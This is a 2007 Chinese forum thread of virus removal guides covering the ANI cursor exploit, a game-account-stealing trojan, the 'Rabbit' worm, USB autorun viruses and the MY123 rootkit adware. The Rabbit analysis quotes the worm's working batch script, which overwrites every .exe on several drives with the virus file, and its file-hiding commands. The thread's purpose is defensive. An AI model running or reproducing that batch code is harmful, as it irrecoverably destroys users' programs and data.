流行的病毒和木马处理方法及专杀工具

[size=2][color=red]江民紧急应对“光标漏洞” 请大家及时打上补丁,病毒专杀下载[/color][/size]


[size=2]★★★江民紧急应对“光标漏洞” 请大家及时打上补丁 以附微软官方下载地址★★★

上周五被反病毒厂商江民科技率先截获的“光标漏洞”病毒引起业界强烈关注。4月2日，微软安全响应中心（MSRC）网站的最新消息称，微软准备于当地时间4月3日发布针对动态光标0day漏洞的补丁程序。上周五，微软安全响应中心曾公布消息称，微软计划在4月常规升级日（4月10日）发布该补丁。此次提前发布补丁，主要是由于上周末针对动态光标0day漏洞的攻击事件增多，以及多份漏洞利用代码被公开促成的。
3月31日，江民公司反病毒中心监测到，一只新的蠕虫病毒"光标漏洞"正利用微软Windows系统ANI文件处理漏洞疯狂传播,反病毒中心已监测到多个网站正在传播该病毒。据江民反病毒专家介绍，"光标漏洞"蠕虫自我传播能力很强。与"熊猫烧香"和威金蠕虫类似，该蠕虫会感染正常的可执行文件和本地网页文件，下载大量木马程序。除此之外，该蠕虫还能够利用自带的SMTP引擎通过电子邮件传播。最令人担心的是，目前病毒利用的微软ANI文件处理漏洞尚无官方补丁，江民反病毒专家担心一场比"熊猫烧香"更可怕的疫情可能会随时发生。

迄今为止，江民公司反病毒中心已经监测到数百个利用此漏洞种植木马的国内网站页面。江民公司提醒广大用户，上网时一定要开启杀毒软件的实时监控功能，并要及时对Windows系统进行升级，以免受到病毒侵害。为了进一步防范该病毒，江民反病毒中心紧急研发推出了“光标漏洞专杀工具”，可有效清除病毒并修复被感染的文件，供电脑用户免费下载使用，怀疑电脑感染“光标漏洞”病毒的用户可以通过以下网址下载。
江民“光标漏洞”病毒专杀下载地址： [/size][url=http://download.jiangmin.info/jmsoft/ANIWormKiller.exe][size=2][color=#0000ff]http://download.jiangmin.info/jmsoft/ANIWormKiller.exe[/color][/size][/url]



[size=2]注意]4月4日凌晨微软官方发布高危ANI漏洞补丁KB925902
4月4日凌晨微软官方发布高危ANI漏洞补丁KB925902

该漏洞非常严重，危害面积非常广！

已有大量木马、恶意程序、蠕虫病毒使用该漏洞进行传播

绝大多数反病毒软件、防漏洞软件、主动防御软件失效！

避免遭受漏洞攻击的唯一办法是安装补丁！

下载地址:

Windows 2000 操作系统:
[/size][url=http://download.microsoft.com/download/d/4/d/d4d5b707-58a9-4fbc-ab58-e20cc86db7bb/Windows2000-KB925902-x86-CHS.EXE][size=2][color=#0000ff]http://download.microsoft.com/download/d/4/d/d4d5b707-58a9-4fbc-ab58-e20cc86db7bb/Windows2000-KB925902-x86-CHS.EXE[/color][/size][/url][size=2]

Windows XP 32位操作系统:
[/size][url=http://download.microsoft.com/download/5/8/3/58324bce-00c5-42b7-bd05-1353c0604dab/WindowsXP-KB925902-x86-CHS.exe][size=2][color=#0000ff]http://download.microsoft.com/download/5/8/3/58324bce-00c5-42b7-bd05-1353c0604dab/WindowsXP-KB925902-x86-CHS.exe[/color][/size][/url][size=2]
Windows XP 64位操作系统:
[/size][url=http://download.microsoft.com/download/c/9/8/c9801bd3-60f1-4d7f-9059-57786b2e0fb6/WindowsServer2003.WindowsXP-KB925902-x64-CHS.exe][size=2][color=#0000ff]http://download.microsoft.com/download/c/9/8/c9801bd3-60f1-4d7f-9059-57786b2e0fb6/WindowsServer2003.WindowsXP-KB925902-x64-CHS.exe[/color][/size][/url][size=2]
Windows 2003 Server 32位操作系统:
[/size][url=http://download.microsoft.com/download/d/8/f/d8fc1f92-a8a3-490a-b8c1-70258436e37f/WindowsServer2003-KB925902-x86-CHS.exe][size=2][color=#0000ff]http://download.microsoft.com/download/d/8/f/d8fc1f92-a8a3-490a-b8c1-70258436e37f/WindowsServer2003-KB925902-x86-CHS.exe[/color][/size][/url][size=2]
Windows 2003 Server 64位操作系统:
[/size][url=http://download.microsoft.com/download/3/e/f/3ef26e17-4a40-4a26-afe9-806fc06c4135/WindowsServer2003.WindowsXP-KB925902-x64-CHS.exe][size=2][color=#0000ff]http://download.microsoft.com/download/3/e/f/3ef26e17-4a40-4a26-afe9-806fc06c4135/WindowsServer2003.WindowsXP-KB925902-x64-CHS.exe[/color][/size][/url][size=2]
Windows Vista 32位操作系统:
[/size][url=http://www.microsoft.com/downloads/info.aspx?na=90&p=&SrcDisplayLang=zh-cn&SrcCategoryId=&SrcFamilyId=d8b0e65c-5b41-46eb-92df-0b062cfcdeec&u=http%3a%2f%2fdownload.microsoft.com%2fdownload%2f0%2f4%2f7%2f0472557e-05f2-471e-a018-3286d63c51c3%2fWindows6.0-KB925902-x86.msu][size=2][color=#0000ff]http://www.microsoft.com/downloads/info.aspx?na=90&p=&SrcDisplayLang=zh-cn&SrcCategoryId=&SrcFamilyId=d8b0e65c-5b41-46eb-92df-0b062cfcdeec&u=http%3a%2f%2fdownload.microsoft.com%2fdownload%2f0%2f4%2f7%2f0472557e-05f2-471e-a018-3286d63c51c3%2fWindows6.0-KB925902-x86.msu[/color][/size][/url][size=2]
Windows Vista 64位操作系统:
[/size][url=http://www.microsoft.com/downloads/info.aspx?na=90&p=&SrcDisplayLang=zh-cn&SrcCategoryId=&SrcFamilyId=fb0ff2b5-05fe-4158-b4b7-da0d7f82c04b&u=http%3a%2f%2fdownload.microsoft.com%2fdownload%2fe%2fc%2f6%2fec655640-a995-436a-895a-5997bd3a7552%2fWindows6.0-KB925902-x64.msu][size=2][color=#0000ff]http://www.microsoft.com/downloads/info.aspx?na=90&p=&SrcDisplayLang=zh-cn&SrcCategoryId=&SrcFamilyId=fb0ff2b5-05fe-4158-b4b7-da0d7f82c04b&u=http%3a%2f%2fdownload.microsoft.com%2fdownload%2fe%2fc%2f6%2fec655640-a995-436a-895a-5997bd3a7552%2fWindows6.0-KB925902-x64.msu[/color][/size][/url]

[[i] 本帖最后由 caozhihui 于 2007-9-16 17:50 编辑 [/i]]

[color=red]魔域盗贼”病毒介绍及解决方案[/color]

来自金山毒霸反病毒中心最新消息：4月7日，一名为“魔域盗贼”变种MS（Win32.Troj.OnlineGames.ms）的网游盗号木马异常活跃，仅4月7日一天，金山毒霸客户服务中心就接到数百用户的求助电话。此变种除了盗取“魔域”帐号外，还可盗取“完美世界”和“浩方游戏平台”的账号密码，比之前的一些变种更加险恶。

　　金山毒霸反病毒专家戴光剑表示，“魔域盗贼”变种MS并非一普通的游戏盗号木马，它可用特殊的方法逃避杀毒软件的查杀，而且由于病毒本身存在一个缺陷，所以用户一旦中招，系统在启动过程中将无法显示桌面，致使用户无法看到桌面图标，而只能看到一个空白的桌面。

　　专家介绍，该病毒运行后，会把自己拷贝到系统目录中，并释放一个病毒文件C:\WINDOWS\system32\wsttrs.dll(Win32.Troj.Onlinegames.nb.12288)，之后病毒体将自行删除。

　　用户一旦感染该病毒，病毒会寻找网络游戏“魔域”等的游戏进程，并使用钩子读取用户输入的游戏帐号与信息，把得到的信息通过wsttrs.dll文件以网站上传的方式发送到木马种植者事先指定的网站上去，使用户的游戏帐号丢失。

　　金山毒霸从5日开始就发现了该病毒的多个变种，而截止到目前，金山毒霸客户服务中心已接到数百用户的求助电话。针对该病毒的传播特点，金山毒霸反病毒中心及时进行了病毒样本分析，毒霸用户只要升级病毒库到2007.04.07.16，即可查杀该病毒目前所有变种。此外，对于非毒霸用户，金山毒霸反病毒工程师为您提供了一套手动清除方案，您可以根据方案中的清除方法彻底清除该病毒。

　　“魔域盗贼”变种MS的手动解决方案

　　1、在windows XP及其以上系统中：

　　当无法进入桌面的时候，调出windows任务管理器（Ctrl+Alt+Delete调出），切换到进程标签，然后找到 wsttrs.exe进程，选中后单击右键结束进程，既可正常显示桌面。

　　2、在windows 2000及其它系统中

　　需要进入带网络连接的安全模式，升级毒霸到最新版本（2007.04.07.16），对windows目录进行查毒，病毒查杀结束后，重启系统即可正常显示桌面。

　　3、当以上两种方案都不能成功，则有可能是该病毒的最新变种，应进入安全模式，打开注册表编辑器，定位到HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\CurrentVersion\RunOnce（注意是RunOnce不是Run）

　　查找启动程序位于 系统盘\windows 或者 系统盘\WinNT 文件夹下的启动项。

　　例如： wstthrs c:\windows\wsttrs.exe

　　或者wstthrs c:\winnt\wsttrs.exe

　　删除改键值，并向金山毒霸提交该文件，重启系统既可。

[color=red]兔子病毒的分工工作模式和清理方法[/color]
工作模式：

兔子的几个文件之间存在明显的分工合作关系：

当病毒原文件Rabbit.exe被执行后，会在system32下释放出loveRabbit.exe、jk.exe和love.bat，并执行loveRabbit.exe和love.bat

先看看下面love.bat的内容吧，列出defgh分区和program files的exe文件的列表c:\windows\下的msconfig.inf和msconfig1.inf，并用两个for命令调用copy命令把列表中的exe文件全部用Rabbit.exe替换掉！需要知道这个行为比熊猫和硬盘杀手还有恨，这样丢失的数据基本上是找不回来的！



QUOTE:
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"


其中loveRabbit.exe是比较关键的一个进程，这个病毒的大部分工作是由它做的，它负责在system32下生成msexch400.dll并插入winlogon.exe进程；不断生成loveRabbit.bat和DEFG分区根目录下面的autorun.inf文件，并执行不断loveRabbit.bat；
删除注册表项HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}和HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}，不断添加注册表项HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath；而且它还能关闭icesword和sreng等安全软件；它还能对安全模式的键值作出检查，如被修复了它立刻删除相关键值；

另外一个批处理就是被loveRabbit.exe不断执行的loveRabbit.bat，作用是不断的将病毒文件设置系统和隐藏属性；



QUOTE:

attrib +s +h C:\WINDOWS\system32\msexch400.dll
attrib +s +h d:\Rabbit.exe
attrib +s +h e:\Rabbit.exe
attrib +s +h c:\Rabbit.exe
attrib +s +h f:\Rabbit.exe
attrib +s +h g:\Rabbit.exe
attrib +s +h h:\Rabbit.exe
attrib +s +h e:\AutoRun.inf
attrib +s +h f:\AutoRun.inf
attrib +s +h c:\AutoRun.inf
attrib +s +h d:\AutoRun.inf
attrib +s +h h:\AutoRun.inf
attrib +s +h g:\AutoRun.inf


而被插入msexch400.dll模块的winlogon.exe的线程数会不断上升，干扰正常的关机和注销，并在loveRabbit.exe被结束时由winlogon.exe重新启动；

至于jk.exe的工作就简单多了，它运行后会检查loverabbit.exe是否被关闭，如关闭了就重新运行它，之后便退出，是用于系统启动时激活病毒的进程；

还有就是在各个分区下面的autorun.inf和rabbit.exe，用于双击进入分区时重新激活病毒；

明显的分工，编写者的思路很清晰，启动用的jk.exe、主要工作进程loverabbit.exe、插入模块msexch400.dll和两个bat文件等，各有各做的事情，合作起来使得运行后病毒很难会被结束掉；



清理办法：

由于它的进程守护太好了，要关闭它实在不容易，而且安全模式被破坏了，就只有另外想办法了……
方法一：这个病毒有个疏忽的地方，就是jk.exe不能靠loverabbit.exe进行修复，而这个是系统启动是激活病毒用的，这就给了我们一个机会了；首先到system32文件夹下面删除jk.exe，不过病毒把系统大部分的exe文件都替换了，所有启动项里面一定要先进行清空然后才重启，由于病毒控制了winlogon.exe进程导致不能正常重启，所以我们就用不经过winlogon.exe的重启方式吧，打开任务管理器，然后按着ctrl再选择任务管理器的关机菜单里面的重启，这样就重启成功了，重启完成后正式清理；

方法二（推荐）：映象劫持，最近学回来的东西，嘻嘻；注册表文件的内容如下，将其导入注册表并结束loverabbit.exe进程之后就可以正式清理了；



QUOTE:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loverabbit.exe]
"Debugger"="dikex.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rabbit.exe]
"Debugger"="dikex.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jk.exe]
"Debugger"="dikex.exe"


正式清理：首先到文件夹选项把所有隐藏文件都显示出来，之后删除下面的文件，其中msexch400.dll需要重启或者使用unlocker等工具删除：

QUOTE:
C:\WINDOWS\system32\JK.exe
C:\WINDOWS\system32\love.bat
C:\WINDOWS\system32\loveRabbit.bat
C:\WINDOWS\system32\loveRabbit.exe
C:\WINDOWS\system32\msexch400.dll
C:\WINDOWS\system32\Rabbit.exe
C:\WINDOWS\msconfig.inf
C:\WINDOWS\msconfig1.inf

各个分区根目录下面的rabbit.exe和autorun.inf文件

在我的电脑里面搜索*.exe，把变了兔子图标的文件全部删除（他们无法挽救的了，节哀吧……）

最后删除注册表HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\下面的{4bf41072-b2b1-21c1-b5c1-0305f4155515}，导入下面注册表信息：



QUOTE:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"

[[i] 本帖最后由 caozhihui 于 2007-9-16 10:20 编辑 [/i]]

[color=red]所有修改系统时间病毒的解决参考办法
[/color]

1、断网
2、bios修正系统时间
3、进入“安全模式”，安装360safe3.2，杀恶意软件，去多余插件，全选插件免疫。
4、先运行dr web官方提供的绿色cureit.exe（下载地址[url=ftp://ftp.drweb.com/pub/drweb/cureit/cureit.exe]ftp://ftp.drweb.com/pub/drweb/cureit/cureit.exe[/url]）查杀，所有感染文件先杀后删。
5、dr web全部杀完后，运行超级巡警之U盘病毒免疫器（下载地址[url=http://www.skycn.com/soft/32547.html?url=antiautorun.zip]http://www.skycn.com/soft/32547.html?url=antiautorun.zip[/url]），所有磁盘免疫，包括u盘。
6、以前有镜像的重启直接恢复（硕。。。）!!ok!进入windows，再安装一遍360safe，升级，杀恶意软件，去多余插件，全选插件免疫，下载修复所有系统漏洞（下载速度超快）!

[[i] 本帖最后由 caozhihui 于 2007-9-16 10:21 编辑 [/i]]

[color=red]驱除毒源双击无法打开驱动器的杀毒方法[/color]



昨天将U盘插到电脑后双击无法打开，紧接着双击所有驱动器盘符都没有办法打开，试验以后发现只有使用资源管理器可以。但终究不爽，鬼知道病毒在电脑里还干了些什么，决定彻底杀掉。

症状描述

1.双击驱动器盘符无法打开，资源管理器可以使用。

2.在开始→运行里输入cmd进入命令行模式，输入 C:回车 ，进入C盘根目录，输入 dir /a 查看所有文件，发现存在如下两个文件： Autorun.inf RavMon.exe。

3.在开始→运行里输入msconfig，进入系统配置程序，选择“启动”标签，里面有一个叫做 “MDM”的项指向“C:\windows\mdm.exe”。

解决方法

1.重新启动，开机时按F8，进入带命令行的安全模式，选择Administrator账号登陆。

2.在命令行下输入regedit进入注册表，查找"RavMon.exe"，如果发现匹配项就删除(我 没有发现，这样做是保险起见)。注意RsRavMon是瑞星杀毒软件，不用删除。

3.在命令行下输入msconfig，进入系统配置程序，选择“启动”标签，将所有“MDM”项前面 的勾去掉保存。

4.在命令行下输入以下指令



QUOTE:
del C:\Autorun.inf /f /s /q /a del
C:\RavMon.exe /f /s /q /a del
D:\Autorun.inf /f /s /q /a del
D:\RavMon.exe /f /s /q /a ……




有多少盘符输多少个。注意这个指令会删除根目录往下所有目录的对应文件，所以大家看 到删除了根目录下的以后马上按Ctrl+C中断。
5.重新启动，OK啦。

6.要彻底清楚，主要还是要把U盘里的毒源杀掉。我没有试别的办法，直接偷懒进Linux下 用rm删了个干净。如果大家认识的人有装Linux的可以请他帮忙，个人认为这样做是最安全的。在Windows/Dos平台下怎么做还请高手出招。

说明

1.MDM是微软的Machine Debug Manager，系统进程;病毒伪装成了mdm.exe。

2.本杀毒方法思想可用于清除类似病毒。

[[i] 本帖最后由 caozhihui 于 2007-9-16 10:21 编辑 [/i]]

[color=red]深入剖析　MY123流氓软件四种清除方法
[/color]

MY123创造了很多流氓软件的第一，有望争夺流氓软件的“最流氓软件宝座”：

1、驱动保护(System Bus Extend驱动，安全模式下也加载)

2、随机文件名，DLL和SYS

3、多线程保护，网络自动升级

4、极强的自动恢复(即使在所有文件被删除的情况下，仍然可以通过内存恢复!)

5、驱动文件独占方式，其它任何程序也无法读写及删除

6、有预谋定时爆发(2006/11/11)

一、MY123的前世今生

风雨送飘(飘雪piaoxue)归,飞雪(fiexue)迎春到。才别傲讯(allxun)网，又见一二三(MY123)。

短短一个多月时间，这些锁主页的流氓软件已经让上千万的网民明白了什么叫做强盗，什么叫做无耻，什么叫做疯狂。9号的时候就已经听人放言10号以后会有一个流氓会大规模爆发。果然，在2006/11/11号这个光棍节的时候,MY123如期而至。现在看来，原因在于这个流氓软件已经早就潜伏于用户的电脑中，通过和多个其它流氓软件的捆绑以及其它的渠道，已经潜入成百上千万的网民电脑中，平常也是启动的，但判断日期小于11/11号，就潜伏不动，一旦系统时间大于11号，就开始修改用户主页。而选择这个特殊时间，选择在周未的时候，显然也是别有用心，可以利用反病毒厂商假期的时候反应不及时而大规模爆发。

从规模及爆发面积来看，全国各地可能有数百万甚至上千万用户被该流氓恶意修改了主页，这和之前爆发的大面积piaoxue.com,feixue.net,73ss.com,9505.com,81915.com,4199.com等恶意修改用户主页，十分相似。同以往的一些“老流氓”相比，这些新流氓的特征是爆发面积特别大，效果明显，目的明确单一(修改主页)，手段新奇狠毒，叹为观止。

显然这是一场预谋已久的活动，并且短短几天内，这个驱动病毒至少已经有三个不同的版本，造成一些专杀工具失效。这个MY123已经具备所有病毒的特征，希望总有一天法律能将这种无良的作者绳之以法。

二、剖析流氓手段

这个驱动经过层层改进，家庭发扬得很光大，看看：

1、飘雪(piaoxue)

2、飞雪(feixue)

3、QQHelper

4、allxun.com傲讯

5、My123(7255)

最早的MY123只有一个驱动，已经有多个专杀工具可以杀。后来又出现版本2，即多一个同名的.dll位于system32目录下，现在的版本3，是一个非同名的.dll位于system32目录下。今天主要分析一下我手头拿到的这个版本3。

1、程序安装

首先是释放一个.dll到system32目录下，文件名的特征是随机的8位字母(也有版本是6位字母加2位数字)，然后调用rundll32.exe wceiukte,DllUnregisterServer来注册COM组件，接下来调用Rundll32.exe wceiukte.dll,DllCanUnloadNow来运行程序，并且注册WH_CALLWNDPROC这个系统挂钩。

DLL分别注入SYSTEM和EXPLORER进程空间，进行保护，如果检测没有驱动，则会自动释放出驱动，然后加载。同时这个DLL具有网络下载升级功能。

这个dll运行后，会生成一个.sys文件，放到drivers系统目录下。DLL通过一个算法得到SYS文件名，算法是：

DLL的文件名

ascii码+32143289052890852-32143289052890848-34320958+34320955就就是SYS文件名

也就是ascii + 1

即.dll的文件名为：wceiukte.dll那么.sys文件名就为：xdfjvluf.sys

2、注册和加载驱动

会在注册表的HKLM\SYSTEM\CurrentControlSet\Services\下写下同驱动名的一个值，把自己注册为System Bus Extend的驱动，使得它的优先级很高，即使在安全模式下加载，也使得很多想清除它的软件无效。然后通过services来加载驱动，驱动加载后，生成三个线程附加到system这个系统核心进程上，(以前的驱动是两个线程)获取最高权限。通过Process Explorer可以查看到这三个线程：

三个线程的作用分别为：

0x1dd4：自身文件独占及句柄检测保护模块等,会将自身文件以独占方式打开,这样若不解除独占,任何windows下使用常规访问文件方法的程序包括杀毒软件都无法读写或者删除它的驱动程序文件。

文件句柄检测保护模块则是为了防止手工或者专杀的解除句柄的操作。以前的手工清除或者专杀都是需要先解除这个独占，才能删除文件。

但该驱动增加了这个保护,会不停检测自身文件的独占是否被强制解除,如果检测到,立即再次独占.

0x1816：服务保护模块:该模块会检测驱动自身的注册表服务项,不停地暴力重写自身服务项,使得无法删除其服务项。

0x103e: 篡改首页模块:该模块会不停暴力重写注册表中首页设置为[url=http://www.my123.com]www.my123.com[/url],导致无法对该项进行修复。
三、手工清除办法(适合目前有一定操作技能的用户)

清除了这个流氓的手段，就可以针对来找一些清除办法了。当然，比起上一次的飘雪来，困难了许多。

1、找出驱动

要杀流氓软件的第一步，就是要找出流氓软件，可以有多种办法找出这个流氓软件。

用到我以前写的一篇文章《釜底抽薪:用autoruns揪出流氓软件的驱动保护》，我们今天就来实战一下。运行autoruns之后，在它的“Options(选项)”菜单中有两项“Verifiy Code Signatures(验证代码签名)“Hide Signed Microsoft Entries(隐藏已签名的微软项)“，把这两项都选中了。扫描之后，我们只看驱动(driver)这一项：

可以看出来，它是假冒微软的驱动。这个驱动虽然写明是微软的，但是没有经过微软的数字签名，所以肯定是假的。(可能你的机器上显示特别多，但所有非微软的，都是有问题的)，因为是随机生成的文件名，所以你那里找出来的，可能跟我的不一样。请自己记下文件名。特征是8位随机的字母，并且公司是微软公司，但是显示(Not verified)，如果你这里不能确认，可以用下面的办法。

2、用procexp找出驱动名来

运行procexp,(下载地址见最后)，找到system这个进程，然后点右键——属性(Properties)——线程(Threads)，然后把下面的框子拉到最后，看有连续三个，比较无规则的八个字母的驱动，再跟autoruns对一下就可以确定是哪个驱动了。

3、删除驱动.sys

打开c:\windows\sytem32\drivers目录，由于这个.sys驱动文件把自己设为系统、隐藏，所以需要打开文件夹的显示系统文件的选项才能看到。(你也可以用这个办法来找到驱动，一般的正常驱动都不会想着隐藏自己的)。

在那个驱动文件上点右键，然后——Unlocker——会出来一个对话框，显示当前已经使用这个.sys的进程，点“Unlock“，然后再Unlocker一下......显示文件已经被删除了。。。。。以为大功告成了。

但是紧接着怪事就出事了，刷新一下，发觉这个文件又出现了!百思不得其解，已经确认所有的后台服务都是正常的，那个.dll也已经被删除了....这个问题困扰了许久，又拿出驱动好好研究了一下，终于发觉这个极其变态的办法——一个正常的人是不可能把写出这样的驱动的!

它注册了一个NotifyRoutine的一个回调函数，这个是一个自我修复的功能，只要系统任何进程或线程打开，它马上会调用，检查文件如果被删了就立即从内存中自动恢复!显然是针对上一次飘雪的那个手工专杀或者清除办法做的一次改进，正常办法根本不可能删掉。

用unlocker的确是把文件删除了，但是没有办法不启动其它进程或者线程啊，即使马上选择关机，它也会新建线程，这个时候它也马上可能恢复了。

也不知怎么了,突然灵光一线,想到一个绝招:断电法!就是:删除之后,马上不做任何操作,直接按机器电源键重启!经实验是成功的,OK...followed me...

清除之前,我们先要停止那三个system中的线程,那个会不停地自动检测,打开procexp,然后在system上点右键---属性---线程， 点一下Start Address,这样可以按字母排序，找到刚才我们看到的驱动，三个连续在一起。点一下线程，然后点那个“Suspend“按钮，将这个线程暂停。(它做了自我保护，杀不掉的，只能暂停)。

确保停止线程之后，这个按钮都变成“Resume(暂停)”，三个线程全部暂停之后，打开c:\windows\system32\drivers目录，右键点那个.sys驱动---unlocker。

第一次先unlock那个System的句柄占用。第二次再unlocker，这个时候就会出来一个对话框：

这时注意了：

一手将鼠标移动OK对话框中，一手找到机器的RESET键(请确保这个键有效，直接断电对机器有损伤)，在按下鼠标之后，一看到那个删除OK的提示之后，马上按下RESET键，直接重启机器(如果是笔记本，就先把电池拿了，直接断电)。这个办法讲究眼急手快，如果无效再试一次。

按我的经验，两秒之后按下RESET键都是有效的(杀这个东西真不容易，再次诅咒一个写出这么变态驱动的人来)。

3、删除.dll

当失去驱动保护之后，这个DLL也就肉鸡了，要杀要剐全凭你喜欢了。你放在那里不管也无所谓。它隐藏得也很深，没有在注册表的启动组里面表现出来。360出的专杀，只能杀MY123的前两代，对于这个第三代，目前为止还不能清除，只能清除.dll。所以有时开机之后会显示加载DLL失败：

这个是由那个该死的驱动去加载的，所以找注册表是没有用的。

重启之后，再重新设一下IE的主页，应该就可以了。至于那个Seriver的值，删不删都无所谓了。

四、DOS大法

DOS大法一直是我们杀这类驱动流氓的最后一招，无论多么强的驱动保护，只要用了它，手到擒来，但是由于要安装另外一个系统或者操作DOS，对于新手来说，有一定难度，所以一般来说，都不是我推荐的。这里建议去下载一个叫vfloopy的虚拟软驱软件，安装之后，系统重启的时候就多了一项，启动到虚拟软驱，这样可以直去直接删除这个驱动文件。

上面这个累了一身汗的办法，不知多久就地失效，但思路是一样的，只要找到驱动文件，下面就是如何删除的问题。写飘雪的时候就想着写这个办法了，但是觉得麻烦，不愿意再启一个操作系统。

你也可以用深山红叶这类系统急救光盘或者另外一个Windows去删除那个驱动文件，具体的操作流程我就不多费口舌了。

五、专杀工具

当然，上面这些操作还是比较繁琐，对于普通用户来说难度太高了。目前市面已经可以清除MY123的工具有：

360专杀工具：目前可以清除1，2，3代。

Windows清理助手：目前可以清除1，2，3代，效果不错。

都是好东西，认真学习。辛苦了。

已经很久没有遇到过病毒了

[[i] 本帖最后由 caozhihui 于 2007-9-17 17:16 编辑 [/i]]

确实是好东西
不支持不行啊

[quote]原帖由 [i]奥运2008年[/i] 于 2007-9-17 11:29 发表 [url=http://www.it228.com/redirect.php?goto=findpost&pid=151029&ptid=17044][img]http://www.it228.com/images/common/back.gif[/img][/url]
已经很久没有遇到过病毒了 [/quote]




  不愧是高手``!
　　强悍｀！:qiang:

谢谢楼主 学习了一下 谢谢

另外找到一个更直接的系统补丁东东  

WinXP SP2 截至 9.11 更新程序 完美者升级系列，自动检测安装软件名称： WinXP SP2 截至 9.11 更新程序 完美者升级系列，自动检测安装
软件大小： 110 MB  
软件语言： 简体中文
软件类别： 国产软件 - 系统工具 - 升级补丁

[img]http://www.gpxz.com/soft/UploadPic/2007-9/200791211354251993.jpg[/img]
∷软件简介∷   

WinXP SP2 截至 9.11 更新汇总

XP更新程序(83个)
其他更新程序(4个)

安装程序会自动检测跳过系统已安装的更新程序。

确保安装完后系统状态和原版自动升级结果完全一致！

MD5:493c910f6bf61ee52f277fc2064f0b02   WinXpTo911.exe


下载地址：
[url=http://www.gpxz.com/softinfo/1268.html][color=#0000ff]http://www.gpxz.com/softinfo/1268.html[/color][/url]

[[i] 本帖最后由 qlmzzk 于 2007-9-17 18:04 编辑 [/i]]

热心会员！谢谢你的支持与分享``！

好东西，谢谢大家分享，都是能人

谢谢版主，对于我们菜鸟实在是太有用了。